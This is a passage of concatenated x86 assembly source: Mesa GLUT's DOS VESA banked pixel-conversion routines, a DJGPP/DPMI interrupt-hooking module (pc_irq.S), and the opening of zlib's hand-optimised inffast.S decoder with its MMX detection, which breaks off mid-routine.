movl (%esi), %eax /* load BGRA pixel */
addl $4, %esi
CVT_32_TO_16(a, ebx) /* ax = 5:6:5 pixel */
movw %ax, %fs:(%edi)
addl $2, %edi
subl $2, %ecx
jnz 1b
popl %ecx
popl %eax
addl _vl_current_delta, %edi /* skip the per-row delta */
decl %eax
jnz 0b
popl %ebp
popl %edi
popl %esi
popl %ebx
ret
.p2align 5,,31
.global _vesa_b_dump_32_to_15
/* Banked dump, 32bpp BGRA source -> B5G5R5 destination.
 * Identical structure to _vesa_b_dump_32_to_16 but narrows through
 * CVT_32_TO_15 (5-bit green).
 */
_vesa_b_dump_32_to_15:
pushl %ebx
pushl %esi
pushl %edi
pushl %ebp
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vesa_gran_shift, %ecx
movl _vesa_gran_mask, %ebp
movl %edi, %edx
xorl %ebx, %ebx
andl %ebp, %edi /* edi = offset inside the bank window */
shrl %cl, %edx /* edx = starting bank */
incl %ebp /* ebp = bank size */
call *_vesa_swbank
movl _vl_current_stride, %ecx
movl _vl_current_height, %eax
.balign 4
0:
pushl %eax
pushl %ecx
.balign 4
1:
cmpl %ebp, %edi
jb 2f
incl %edx
xorl %ebx, %ebx
call *_vesa_swbank
subl %ebp, %edi
.balign 4
2:
movl (%esi), %eax /* load BGRA pixel */
addl $4, %esi
CVT_32_TO_15(a, ebx) /* ax = 5:5:5 pixel */
movw %ax, %fs:(%edi)
addl $2, %edi
subl $2, %ecx
jnz 1b
popl %ecx
popl %eax
addl _vl_current_delta, %edi /* skip the per-row delta */
decl %eax
jnz 0b
popl %ebp
popl %edi
popl %esi
popl %ebx
ret
.p2align 5,,31
.global _vesa_b_dump_32_to_8
/* Banked dump, 32bpp BGRA source -> 8bpp "fake8" destination.
 * Conversion is the same 6x6x6 cube as _vesa_l_dump_32_to_8
 * (index = b*36 + g*6 + r via the _array_* tables).  Because the
 * conversion clobbers edx, the current bank number is kept on the
 * stack and popped/incremented/re-pushed around each bank switch.
 */
_vesa_b_dump_32_to_8:
pushl %ebx
pushl %esi
pushl %edi
pushl %ebp
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vesa_gran_shift, %ecx
movl _vesa_gran_mask, %ebp
movl %edi, %edx
xorl %ebx, %ebx
andl %ebp, %edi /* edi = offset inside the bank window */
shrl %cl, %edx /* edx = starting bank */
incl %ebp /* ebp = bank size */
call *_vesa_swbank
movl _vl_current_stride, %ecx
movl _vl_current_height, %eax
.balign 4
0:
pushl %eax
pushl %ecx
pushl %edx /* bank number lives on the stack inside the row */
.balign 4
1:
cmpl %ebp, %edi
jb 2f
popl %edx /* fetch, bump and re-save the bank number */
incl %edx
pushl %edx
xorl %ebx, %ebx
call *_vesa_swbank
subl %ebp, %edi
.balign 4
2:
movl (%esi), %eax /* load BGRA pixel */
addl $4, %esi
#if 1
xorl %ebx, %ebx
movl %eax, %edx
movb %ah, %bl /* bl = green */
shrl $16, %edx
andl $0xFF, %edx /* edx = red */
andl $0xFF, %eax /* eax = blue */
movb _array_b(%eax), %al
movb _array_r(%edx), %dl
movb _array_g(%ebx), %bl
imull $36, %eax /* index = b*36 + g*6 + r */
imull $6, %ebx
addl %edx, %eax
addl %ebx, %eax
#endif
movb %al, %fs:(%edi)
incl %edi
decl %ecx
jnz 1b
popl %edx
popl %ecx
popl %eax
addl _vl_current_delta, %edi /* skip the per-row delta */
decl %eax
jnz 0b
popl %ebp
popl %edi
popl %esi
popl %ebx
ret
.p2align 5,,31
.global _vesa_b_dump_24_to_32
/* Banked dump, 24bpp BGR source -> 32bpp BGRx destination.
 * Loads a dword but advances the source by 3, as in the linear
 * variant (same one-byte overread caveat on the final pixel).
 * ebx = row delta, saved/zeroed around each bank switch.
 */
_vesa_b_dump_24_to_32:
pushl %ebx
pushl %esi
pushl %edi
pushl %ebp
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vesa_gran_shift, %ecx
movl _vesa_gran_mask, %ebp
movl %edi, %edx
xorl %ebx, %ebx
andl %ebp, %edi /* edi = offset inside the bank window */
shrl %cl, %edx /* edx = starting bank */
incl %ebp /* ebp = bank size */
call *_vesa_swbank
movl _vl_current_stride, %ecx
movl _vl_current_height, %eax
movl _vl_current_delta, %ebx
.balign 4
0:
pushl %eax
pushl %ecx
.balign 4
1:
cmpl %ebp, %edi
jb 2f
pushl %ebx /* preserve the delta across the switch */
incl %edx
xorl %ebx, %ebx
call *_vesa_swbank
popl %ebx
subl %ebp, %edi
.balign 4
2:
movl (%esi), %eax /* load BGR (+1 overlap byte) */
addl $3, %esi
movl %eax, %fs:(%edi)
addl $4, %edi
subl $4, %ecx
jnz 1b
popl %ecx
popl %eax
addl %ebx, %edi /* skip the per-row delta */
decl %eax
jnz 0b
popl %ebp
popl %edi
popl %esi
popl %ebx
ret
.p2align 5,,31
.global _vesa_b_dump_24_to_8
/* Banked dump, 24bpp BGR source -> 8bpp "fake8" destination.
 * Same 6x6x6-cube conversion via _array_* as the other *_to_8 paths;
 * source advances 3 bytes per pixel.  The bank number is kept on the
 * stack inside the row loop because the conversion clobbers edx.
 */
_vesa_b_dump_24_to_8:
pushl %ebx
pushl %esi
pushl %edi
pushl %ebp
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vesa_gran_shift, %ecx
movl _vesa_gran_mask, %ebp
movl %edi, %edx
xorl %ebx, %ebx
andl %ebp, %edi /* edi = offset inside the bank window */
shrl %cl, %edx /* edx = starting bank */
incl %ebp /* ebp = bank size */
call *_vesa_swbank
movl _vl_current_stride, %ecx
movl _vl_current_height, %eax
.balign 4
0:
pushl %eax
pushl %ecx
pushl %edx /* bank number lives on the stack inside the row */
.balign 4
1:
cmpl %ebp, %edi
jb 2f
popl %edx /* fetch, bump and re-save the bank number */
incl %edx
pushl %edx
xorl %ebx, %ebx
call *_vesa_swbank
subl %ebp, %edi
.balign 4
2:
movl (%esi), %eax /* load BGR (+1 overlap byte) */
addl $3, %esi
#if 1
xorl %ebx, %ebx
movl %eax, %edx
movb %ah, %bl /* bl = green */
shrl $16, %edx
andl $0xFF, %edx /* edx = red */
andl $0xFF, %eax /* eax = blue */
movb _array_b(%eax), %al
movb _array_r(%edx), %dl
movb _array_g(%ebx), %bl
imull $36, %eax /* index = b*36 + g*6 + r */
imull $6, %ebx
addl %edx, %eax
addl %ebx, %eax
#endif
movb %al, %fs:(%edi)
incl %edi
decl %ecx
jnz 1b
popl %edx
popl %ecx
popl %eax
addl _vl_current_delta, %edi /* skip the per-row delta */
decl %eax
jnz 0b
popl %ebp
popl %edi
popl %esi
popl %ebx
ret
.p2align 5,,31
.global _vesa_b_dump_16_to_15
/* Banked dump, B5G6R5 source -> B5G5R5 destination.
 * One pixel per iteration: only %ax is loaded/stored; CVT_16_TO_15
 * runs on the full eax but the masks zero bit 16 of the scratch, so
 * the stale upper half cannot leak into the stored word.
 */
_vesa_b_dump_16_to_15:
pushl %ebx
pushl %esi
pushl %edi
pushl %ebp
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vesa_gran_shift, %ecx
movl _vesa_gran_mask, %ebp
movl %edi, %edx
xorl %ebx, %ebx
andl %ebp, %edi /* edi = offset inside the bank window */
shrl %cl, %edx /* edx = starting bank */
incl %ebp /* ebp = bank size */
call *_vesa_swbank
movl _vl_current_stride, %ecx
movl _vl_current_height, %eax
.balign 4
0:
pushl %eax
pushl %ecx
.balign 4
1:
cmpl %ebp, %edi
jb 2f
incl %edx
xorl %ebx, %ebx
call *_vesa_swbank
subl %ebp, %edi
.balign 4
2:
movw (%esi), %ax /* load one 16bpp pixel */
addl $2, %esi
CVT_16_TO_15(eax, ebx) /* narrow to 5:5:5 (low word only used) */
movw %ax, %fs:(%edi)
addl $2, %edi
subl $2, %ecx
jnz 1b
popl %ecx
popl %eax
addl _vl_current_delta, %edi /* skip the per-row delta */
decl %eax
jnz 0b
popl %ebp
popl %edi
popl %esi
popl %ebx
ret
.p2align 5,,31
.global _vesa_b_dump_16_to_8
/* Banked dump, B5G6R5 source -> 8bpp destination via the 64K
 * _tab_16_8 lookup table, one pixel/byte per iteration.  The
 * `andl $0xFFFF` clears the stale upper half of eax left by the
 * 16-bit load before it is used as the table index.
 * ebx = row delta, saved/zeroed around each bank switch.
 */
_vesa_b_dump_16_to_8:
pushl %ebx
pushl %esi
pushl %edi
pushl %ebp
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vesa_gran_shift, %ecx
movl _vesa_gran_mask, %ebp
movl %edi, %edx
xorl %ebx, %ebx
andl %ebp, %edi /* edi = offset inside the bank window */
shrl %cl, %edx /* edx = starting bank */
incl %ebp /* ebp = bank size */
call *_vesa_swbank
movl _vl_current_stride, %ecx
movl _vl_current_height, %eax
movl _vl_current_delta, %ebx
.balign 4
0:
pushl %eax
pushl %ecx
.balign 4
1:
cmpl %ebp, %edi
jb 2f
pushl %ebx /* preserve the delta across the switch */
incl %edx
xorl %ebx, %ebx
call *_vesa_swbank
popl %ebx
subl %ebp, %edi
.balign 4
2:
movw (%esi), %ax /* load one 16bpp pixel */
addl $2, %esi
#if 1
andl $0xFFFF, %eax /* zero stale high bits before indexing */
movb _tab_16_8(%eax), %al
#endif
movb %al, %fs:(%edi)
addl $1, %edi
subl $1, %ecx
jnz 1b
popl %ecx
popl %eax
addl %ebx, %edi /* skip the per-row delta */
decl %eax
jnz 0b
popl %ebp
popl %edi
popl %esi
popl %ebx
ret
|
AIFM-sys/AIFM
| 3,173
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/glut/dos/PC_HW/pc_irq.S
|
/*
* PC/HW routine collection v1.3 for DOS/DJGPP
*
* Copyright (C) 2002 - Daniel Borca
* Email : dborca@yahoo.com
* Web : http://www.geocities.com/dborca
*/
.file "pc_irq.S"
.text
#define IRQ_STACK_SIZE 16384
#define IRQ_WRAPPER_LEN (__irq_wrapper_1-__irq_wrapper_0)
#define IRQ_OLD (__irq_old_0-__irq_wrapper_0)
#define IRQ_HOOK (__irq_hook_0-__irq_wrapper_0)
#define IRQ_STACK (__irq_stack_0-__irq_wrapper_0)
.balign 4
/* Shared head for _pc_install_irq / _pc_remove_irq.  Expects the
 * caller to have set up a standard frame (C args at 8/12(%ebp)) and
 * pushed ebx/edi.
 * Out: edi = address of this IRQ's wrapper block,
 *      bl  = interrupt vector number for the IRQ.
 * An IRQ number > 15 bails out through 'fail', which unwinds the
 * caller's frame and returns -1 on its behalf.
 */
common:
movw $0x0400, %ax /* DPMI 0400h: get version; dh/dl = master/slave PIC base vectors */
int $0x31
movl %ss:8(%ebp), %ebx /* ebx = irq number (caller's first C argument) */
cmpl $15, %ebx
jbe 0f
fail: /* shared error exit, also jumped to by both entry points */
orl $-1, %eax
popl %edi
popl %ebx
leave
ret
0:
movl %ebx, %edi
imull $IRQ_WRAPPER_LEN, %edi
addl $__irq_wrapper_0, %edi /* edi = __irq_wrapper_<irq> */
cmpb $7, %bl
jbe 1f
movb %dl, %dh /* irqs 8..15 are based at the slave PIC vector */
subb $8, %dh
1:
addb %dh, %bl /* bl = PIC base + irq = interrupt vector */
ret
.balign 4
.global _pc_install_irq
/* int pc_install_irq (int i, int (*handler) (void));
 * Hooks hardware interrupt i (0..15) with 'handler', routed through
 * the matching locked wrapper.  Returns 0 on success, -1 on failure
 * (bad irq, slot already hooked, lock failure, or out of memory).
 */
_pc_install_irq:
pushl %ebp
movl %esp, %ebp
pushl %ebx
pushl %edi
call common /* edi = wrapper block, bl = vector */
cmpl $0, IRQ_HOOK(%edi)
jne fail /* slot already in use */
pushl $IRQ_WRAPPER_LEN
pushl %edi
call __go32_dpmi_lock_code /* wrapper runs at interrupt time: lock it */
addl $8, %esp
testl %eax, %eax
jnz fail
pushl $IRQ_STACK_SIZE
call _pc_malloc
popl %edx /* discard arg; edx = IRQ_STACK_SIZE */
testl %eax, %eax
jz fail
addl %edx, %eax /* point at the top of the new stack */
movl %eax, IRQ_STACK(%edi)
movl ___djgpp_ds_alias, %eax
movl %eax, IRQ_STACK+4(%edi) /* esp:ss pair consumed by the wrapper's lss */
movl %ss:12(%ebp), %eax
movl %eax, IRQ_HOOK(%edi) /* second C argument: the handler */
movw $0x0204, %ax /* DPMI 0204h: get pm vector bl -> cx:edx */
int $0x31
movl %edx, IRQ_OLD(%edi) /* remember the old handler for chaining/removal */
movw %cx, IRQ_OLD+4(%edi)
movw $0x0205, %ax /* DPMI 0205h: set pm vector bl = cs:wrapper */
movl %edi, %edx
movl %cs, %ecx
int $0x31
done: /* success exit, shared with _pc_remove_irq */
xorl %eax, %eax
popl %edi
popl %ebx
leave
ret
.balign 4
.global _pc_remove_irq
/* int pc_remove_irq (int i);
 * Unhooks interrupt i: restores the saved vector and frees the
 * wrapper's private stack.  Returns 0 on success, -1 if nothing was
 * installed (or i > 15).
 */
_pc_remove_irq:
pushl %ebp
movl %esp, %ebp
pushl %ebx
pushl %edi
call common /* edi = wrapper block, bl = vector */
cmpl $0, IRQ_HOOK(%edi)
je fail /* nothing hooked on this irq */
movl $0, IRQ_HOOK(%edi)
movw $0x0205, %ax /* DPMI 0205h: restore the original vector */
movl IRQ_OLD(%edi), %edx
movl IRQ_OLD+4(%edi), %ecx
int $0x31
movl IRQ_STACK(%edi), %eax
subl $IRQ_STACK_SIZE, %eax /* back from stack top to the malloc'ed base */
pushl %eax
call _free
popl %eax
jmp done /* return 0 through _pc_install_irq's success exit */
/* Per-IRQ interrupt wrapper template.  Each instantiation is
 * IRQ_WRAPPER_LEN bytes long and carries its own data tail so the
 * install code can reach it at fixed offsets (IRQ_OLD / IRQ_HOOK /
 * IRQ_STACK).  Flow:
 *   - save all general and segment registers;
 *   - switch to the private locked stack (lss from __irq_stack),
 *     load ds/es from the new %ss (the DS alias stored there) and
 *     fs/gs with the conventional-memory selector;
 *   - call the C hook.  Its return value is tested BEFORE the pops
 *     (pops do not touch flags, so the jz after popal still sees it):
 *     zero  -> dismiss the interrupt with iret,
 *     other -> chain to the previous handler via a far indirect jump.
 */
#define WRAPPER(x) ; \
.balign 4 ; \
__irq_wrapper_##x: ; \
pushal ; \
pushl %ds ; \
pushl %es ; \
pushl %fs ; \
pushl %gs ; \
movl %ss, %ebx ; \
movl %esp, %esi ; \
lss %cs:__irq_stack_##x, %esp ; \
pushl %ss ; \
pushl %ss ; \
popl %es ; \
popl %ds ; \
movl ___djgpp_dos_sel, %fs ; \
pushl %fs ; \
popl %gs ; \
call *__irq_hook_##x ; \
movl %ebx, %ss ; \
movl %esi, %esp ; \
testl %eax, %eax ; \
popl %gs ; \
popl %fs ; \
popl %es ; \
popl %ds ; \
popal ; \
jz __irq_ignore_##x ; \
__irq_bypass_##x: ; \
ljmp *%cs:__irq_old_##x ; \
__irq_ignore_##x: ; \
iret ; \
.balign 4 ; \
__irq_old_##x: ; \
.long 0, 0 ; \
__irq_hook_##x: ; \
.long 0 ; \
__irq_stack_##x: ; \
.long 0, 0
/* Stamp out one wrapper (code + old-vector/hook/stack slots) per IRQ 0..15. */
WRAPPER(0);
WRAPPER(1);
WRAPPER(2);
WRAPPER(3);
WRAPPER(4);
WRAPPER(5);
WRAPPER(6);
WRAPPER(7);
WRAPPER(8);
WRAPPER(9);
WRAPPER(10);
WRAPPER(11);
WRAPPER(12);
WRAPPER(13);
WRAPPER(14);
WRAPPER(15);
|
AIFM-sys/AIFM
| 42,842
|
shenango/apps/parsec/pkgs/libs/zlib/src/contrib/inflate86/inffast.S
|
/*
* inffast.S is a hand tuned assembler version of:
*
* inffast.c -- fast decoding
* Copyright (C) 1995-2003 Mark Adler
* For conditions of distribution and use, see copyright notice in zlib.h
*
* Copyright (C) 2003 Chris Anderson <christop@charm.net>
* Please use the copyright conditions above.
*
* This version (Jan-23-2003) of inflate_fast was coded and tested under
* GNU/Linux on a pentium 3, using the gcc-3.2 compiler distribution. On that
* machine, I found that gzip style archives decompressed about 20% faster than
* the gcc-3.2 -O3 -fomit-frame-pointer compiled version. Your results will
* depend on how large of a buffer is used for z_stream.next_in & next_out
* (8K-32K worked best for my 256K cpu cache) and how much overhead there is in
* stream processing I/O and crc32/addler32. In my case, this routine used
* 70% of the cpu time and crc32 used 20%.
*
* I am confident that this version will work in the general case, but I have
* not tested a wide variety of datasets or a wide variety of platforms.
*
* Jan-24-2003 -- Added -DUSE_MMX define for slightly faster inflating.
* It should be a runtime flag instead of compile time flag...
*
* Jan-26-2003 -- Added runtime check for MMX support with cpuid instruction.
* With -DUSE_MMX, only MMX code is compiled. With -DNO_MMX, only non-MMX code
* is compiled. Without either option, runtime detection is enabled. Runtime
* detection should work on all modern cpus and the recomended algorithm (flip
* ID bit on eflags and then use the cpuid instruction) is used in many
* multimedia applications. Tested under win2k with gcc-2.95 and gas-2.12
* distributed with cygwin3. Compiling with gcc-2.95 -c inffast.S -o
* inffast.obj generates a COFF object which can then be linked with MSVC++
* compiled code. Tested under FreeBSD 4.7 with gcc-2.95.
*
* Jan-28-2003 -- Tested Athlon XP... MMX mode is slower than no MMX (and
* slower than compiler generated code). Adjusted cpuid check to use the MMX
* code only for Pentiums < P4 until I have more data on the P4. Speed
* improvment is only about 15% on the Athlon when compared with code generated
* with MSVC++. Not sure yet, but I think the P4 will also be slower using the
* MMX mode because many of it's x86 ALU instructions execute in .5 cycles and
* have less latency than MMX ops. Added code to buffer the last 11 bytes of
* the input stream since the MMX code grabs bits in chunks of 32, which
* differs from the inffast.c algorithm. I don't think there would have been
* read overruns where a page boundary was crossed (a segfault), but there
* could have been overruns when next_in ends on unaligned memory (unintialized
* memory read).
*
* Mar-13-2003 -- P4 MMX is slightly slower than P4 NO_MMX. I created a C
* version of the non-MMX code so that it doesn't depend on zstrm and zstate
* structure offsets which are hard coded in this file. This was last tested
* with zlib-1.2.0 which is currently in beta testing, newer versions of this
* and inffas86.c can be found at http://www.eetbeetee.com/zlib/ and
* http://www.charm.net/~christop/zlib/
*/
/*
* if you have underscore linking problems (_inflate_fast undefined), try
* using -DGAS_COFF
*/
#if ! defined( GAS_COFF ) && ! defined( GAS_ELF )
#if defined( WIN32 ) || defined( __CYGWIN__ )
#define GAS_COFF /* windows object format */
#else
#define GAS_ELF
#endif
#endif /* ! GAS_COFF && ! GAS_ELF */
#if defined( GAS_COFF )
/* coff externals have underscores */
#define inflate_fast _inflate_fast
#define inflate_fast_use_mmx _inflate_fast_use_mmx
#endif /* GAS_COFF */
.file "inffast.S"
.globl inflate_fast
.text
.align 4,0
.L_invalid_literal_length_code_msg:
.string "invalid literal/length code"
.align 4,0
.L_invalid_distance_code_msg:
.string "invalid distance code"
.align 4,0
.L_invalid_distance_too_far_msg:
.string "invalid distance too far back"
#if ! defined( NO_MMX )
.align 4,0
.L_mask: /* mask[N] = ( 1 << N ) - 1 */
/* 33 entries, N = 0..32: low-N-bit extraction masks.  Compiled only
 * when the MMX path may be used (guarded by !NO_MMX above); the
 * consumer is the inflate_fast MMX decode loop further down. */
.long 0
.long 1
.long 3
.long 7
.long 15
.long 31
.long 63
.long 127
.long 255
.long 511
.long 1023
.long 2047
.long 4095
.long 8191
.long 16383
.long 32767
.long 65535
.long 131071
.long 262143
.long 524287
.long 1048575
.long 2097151
.long 4194303
.long 8388607
.long 16777215
.long 33554431
.long 67108863
.long 134217727
.long 268435455
.long 536870911
.long 1073741823
.long 2147483647
.long 4294967295
#endif /* NO_MMX */
.text
/*
* struct z_stream offsets, in zlib.h
*/
#define next_in_strm 0 /* strm->next_in */
#define avail_in_strm 4 /* strm->avail_in */
#define next_out_strm 12 /* strm->next_out */
#define avail_out_strm 16 /* strm->avail_out */
#define msg_strm 24 /* strm->msg */
#define state_strm 28 /* strm->state */
/*
* struct inflate_state offsets, in inflate.h
*/
#define mode_state 0 /* state->mode */
#define wsize_state 32 /* state->wsize */
#define write_state 40 /* state->write */
#define window_state 44 /* state->window */
#define hold_state 48 /* state->hold */
#define bits_state 52 /* state->bits */
#define lencode_state 68 /* state->lencode */
#define distcode_state 72 /* state->distcode */
#define lenbits_state 76 /* state->lenbits */
#define distbits_state 80 /* state->distbits */
/*
* inflate_fast's activation record
*/
#define local_var_size 64 /* how much local space for vars */
#define strm_sp 88 /* first arg: z_stream * (local_var_size + 24) */
#define start_sp 92 /* second arg: unsigned int (local_var_size + 28) */
/*
* offsets for local vars on stack
*/
#define out 60 /* unsigned char* */
#define window 56 /* unsigned char* */
#define wsize 52 /* unsigned int */
#define write 48 /* unsigned int */
#define in 44 /* unsigned char* */
#define beg 40 /* unsigned char* */
#define buf 28 /* char[ 12 ] */
#define len 24 /* unsigned int */
#define last 20 /* unsigned char* */
#define end 16 /* unsigned char* */
#define dcode 12 /* code* */
#define lcode 8 /* code* */
#define dmask 4 /* unsigned int */
#define lmask 0 /* unsigned int */
/*
* typedef enum inflate_mode consts, in inflate.h
*/
#define INFLATE_MODE_TYPE 11 /* state->mode flags enum-ed in inflate.h */
#define INFLATE_MODE_BAD 26
#if ! defined( USE_MMX ) && ! defined( NO_MMX )
#define RUN_TIME_MMX
#define CHECK_MMX 1
#define DO_USE_MMX 2
#define DONT_USE_MMX 3
.globl inflate_fast_use_mmx
.data
.align 4,0
/* Run-time MMX dispatch state: starts at CHECK_MMX and is latched to
 * DO_USE_MMX or DONT_USE_MMX by the cpuid probe on the first call. */
inflate_fast_use_mmx: /* integer flag for run time control 1=check,2=mmx,3=no */
.long CHECK_MMX
#if defined( GAS_ELF )
/* elf info */
.type inflate_fast_use_mmx,@object
.size inflate_fast_use_mmx,4
#endif
#endif /* RUN_TIME_MMX */
#if defined( GAS_COFF )
/* coff info: scl 2 = extern, type 32 = function */
.def inflate_fast; .scl 2; .type 32; .endef
#endif
.text
.align 32,0x90
inflate_fast:
pushl %edi
pushl %esi
pushl %ebp
pushl %ebx
pushf /* save eflags (strm_sp, state_sp assumes this is 32 bits) */
subl $local_var_size, %esp
cld
#define strm_r %esi
#define state_r %edi
movl strm_sp(%esp), strm_r
movl state_strm(strm_r), state_r
/* in = strm->next_in;
* out = strm->next_out;
* last = in + strm->avail_in - 11;
* beg = out - (start - strm->avail_out);
* end = out + (strm->avail_out - 257);
*/
movl avail_in_strm(strm_r), %edx
movl next_in_strm(strm_r), %eax
addl %eax, %edx /* avail_in += next_in */
subl $11, %edx /* avail_in -= 11 */
movl %eax, in(%esp)
movl %edx, last(%esp)
movl start_sp(%esp), %ebp
movl avail_out_strm(strm_r), %ecx
movl next_out_strm(strm_r), %ebx
subl %ecx, %ebp /* start -= avail_out */
negl %ebp /* start = -start */
addl %ebx, %ebp /* start += next_out */
subl $257, %ecx /* avail_out -= 257 */
addl %ebx, %ecx /* avail_out += out */
movl %ebx, out(%esp)
movl %ebp, beg(%esp)
movl %ecx, end(%esp)
/* wsize = state->wsize;
* write = state->write;
* window = state->window;
* hold = state->hold;
* bits = state->bits;
* lcode = state->lencode;
* dcode = state->distcode;
* lmask = ( 1 << state->lenbits ) - 1;
* dmask = ( 1 << state->distbits ) - 1;
*/
movl lencode_state(state_r), %eax
movl distcode_state(state_r), %ecx
movl %eax, lcode(%esp)
movl %ecx, dcode(%esp)
movl $1, %eax
movl lenbits_state(state_r), %ecx
shll %cl, %eax
decl %eax
movl %eax, lmask(%esp)
movl $1, %eax
movl distbits_state(state_r), %ecx
shll %cl, %eax
decl %eax
movl %eax, dmask(%esp)
movl wsize_state(state_r), %eax
movl write_state(state_r), %ecx
movl window_state(state_r), %edx
movl %eax, wsize(%esp)
movl %ecx, write(%esp)
movl %edx, window(%esp)
movl hold_state(state_r), %ebp
movl bits_state(state_r), %ebx
#undef strm_r
#undef state_r
#define in_r %esi
#define from_r %esi
#define out_r %edi
movl in(%esp), in_r
movl last(%esp), %ecx
cmpl in_r, %ecx
ja .L_align_long /* if in < last */
addl $11, %ecx /* ecx = &in[ avail_in ] */
subl in_r, %ecx /* ecx = avail_in */
movl $12, %eax
subl %ecx, %eax /* eax = 12 - avail_in */
leal buf(%esp), %edi
rep movsb /* memcpy( buf, in, avail_in ) */
movl %eax, %ecx
xorl %eax, %eax
rep stosb /* memset( &buf[ avail_in ], 0, 12 - avail_in ) */
leal buf(%esp), in_r /* in = buf */
movl in_r, last(%esp) /* last = in, do just one iteration */
jmp .L_is_aligned
/* align in_r on long boundary */
.L_align_long:
testl $3, in_r
jz .L_is_aligned
xorl %eax, %eax
movb (in_r), %al
incl in_r
movl %ebx, %ecx
addl $8, %ebx
shll %cl, %eax
orl %eax, %ebp
jmp .L_align_long
.L_is_aligned:
movl out(%esp), out_r
#if defined( NO_MMX )
jmp .L_do_loop
#endif
#if defined( USE_MMX )
jmp .L_init_mmx
#endif
/*** Runtime MMX check ***/
#if defined( RUN_TIME_MMX )
.L_check_mmx:
cmpl $DO_USE_MMX, inflate_fast_use_mmx
je .L_init_mmx
ja .L_do_loop /* > 2 */
pushl %eax
pushl %ebx
pushl %ecx
pushl %edx
pushf
movl (%esp), %eax /* copy eflags to eax */
xorl $0x200000, (%esp) /* try toggling ID bit of eflags (bit 21)
* to see if cpu supports cpuid...
* ID bit method not supported by NexGen but
* bios may load a cpuid instruction and
* cpuid may be disabled on Cyrix 5-6x86 */
popf
pushf
popl %edx /* copy new eflags to edx */
xorl %eax, %edx /* test if ID bit is flipped */
jz .L_dont_use_mmx /* not flipped if zero */
xorl %eax, %eax
cpuid
cmpl $0x756e6547, %ebx /* check for GenuineIntel in ebx,ecx,edx */
jne .L_dont_use_mmx
cmpl $0x6c65746e, %ecx
jne .L_dont_use_mmx
cmpl $0x49656e69, %edx
jne .L_dont_use_mmx
movl $1, %eax
cpuid /* get cpu features */
shrl $8, %eax
andl $15, %eax
cmpl $6, %eax /* check for Pentium family, is 0xf for P4 */
jne .L_dont_use_mmx
testl $0x800000, %edx /* test if MMX feature is set (bit 23) */
jnz .L_use_mmx
jmp .L_dont_use_mmx
.L_use_mmx:
movl $DO_USE_MMX, inflate_fast_use_mmx
jmp .L_check_mmx_pop
.L_dont_use_mmx:
movl $DONT_USE_MMX, inflate_fast_use_mmx
.L_check_mmx_pop:
popl %edx
popl %ecx
popl %ebx
popl %eax
jmp .L_check_mmx
#endif
/*** Non-MMX code ***/
#if defined ( NO_MMX ) || defined( RUN_TIME_MMX )
#define hold_r %ebp
#define bits_r %bl
#define bitslong_r %ebx
.align 32,0x90
.L_while_test:
/* while (in < last && out < end)
*/
cmpl out_r, end(%esp)
jbe .L_break_loop /* if (out >= end) */
cmpl in_r, last(%esp)
jbe .L_break_loop
.L_do_loop:
/* regs: %esi = in, %ebp = hold, %bl = bits, %edi = out
*
* do {
* if (bits < 15) {
* hold |= *((unsigned short *)in)++ << bits;
* bits += 16
* }
* this = lcode[hold & lmask]
*/
cmpb $15, bits_r
ja .L_get_length_code /* if (15 < bits) */
xorl %eax, %eax
lodsw /* al = *(ushort *)in++ */
movb bits_r, %cl /* cl = bits, needs it for shifting */
addb $16, bits_r /* bits += 16 */
shll %cl, %eax
orl %eax, hold_r /* hold |= *((ushort *)in)++ << bits */
.L_get_length_code:
movl lmask(%esp), %edx /* edx = lmask */
movl lcode(%esp), %ecx /* ecx = lcode */
andl hold_r, %edx /* edx &= hold */
movl (%ecx,%edx,4), %eax /* eax = lcode[hold & lmask] */
.L_dolen:
/* regs: %esi = in, %ebp = hold, %bl = bits, %edi = out
*
* dolen:
* bits -= this.bits;
* hold >>= this.bits
*/
movb %ah, %cl /* cl = this.bits */
subb %ah, bits_r /* bits -= this.bits */
shrl %cl, hold_r /* hold >>= this.bits */
/* check if op is a literal
* if (op == 0) {
* PUP(out) = this.val;
* }
*/
testb %al, %al
jnz .L_test_for_length_base /* if (op != 0) 45.7% */
shrl $16, %eax /* output this.val char */
stosb
jmp .L_while_test
.L_test_for_length_base:
/* regs: %esi = in, %ebp = hold, %bl = bits, %edi = out, %edx = len
*
* else if (op & 16) {
* len = this.val
* op &= 15
* if (op) {
* if (op > bits) {
* hold |= *((unsigned short *)in)++ << bits;
* bits += 16
* }
* len += hold & mask[op];
* bits -= op;
* hold >>= op;
* }
*/
#define len_r %edx
movl %eax, len_r /* len = this */
shrl $16, len_r /* len = this.val */
movb %al, %cl
testb $16, %al
jz .L_test_for_second_level_length /* if ((op & 16) == 0) 8% */
andb $15, %cl /* op &= 15 */
jz .L_save_len /* if (!op) */
cmpb %cl, bits_r
jae .L_add_bits_to_len /* if (op <= bits) */
movb %cl, %ch /* stash op in ch, freeing cl */
xorl %eax, %eax
lodsw /* al = *(ushort *)in++ */
movb bits_r, %cl /* cl = bits, needs it for shifting */
addb $16, bits_r /* bits += 16 */
shll %cl, %eax
orl %eax, hold_r /* hold |= *((ushort *)in)++ << bits */
movb %ch, %cl /* move op back to ecx */
.L_add_bits_to_len:
movl $1, %eax
shll %cl, %eax
decl %eax
subb %cl, bits_r
andl hold_r, %eax /* eax &= hold */
shrl %cl, hold_r
addl %eax, len_r /* len += hold & mask[op] */
.L_save_len:
movl len_r, len(%esp) /* save len */
#undef len_r
.L_decode_distance:
/* regs: %esi = in, %ebp = hold, %bl = bits, %edi = out, %edx = dist
*
* if (bits < 15) {
* hold |= *((unsigned short *)in)++ << bits;
* bits += 16
* }
* this = dcode[hold & dmask];
* dodist:
* bits -= this.bits;
* hold >>= this.bits;
* op = this.op;
*/
cmpb $15, bits_r
ja .L_get_distance_code /* if (15 < bits) */
xorl %eax, %eax
lodsw /* al = *(ushort *)in++ */
movb bits_r, %cl /* cl = bits, needs it for shifting */
addb $16, bits_r /* bits += 16 */
shll %cl, %eax
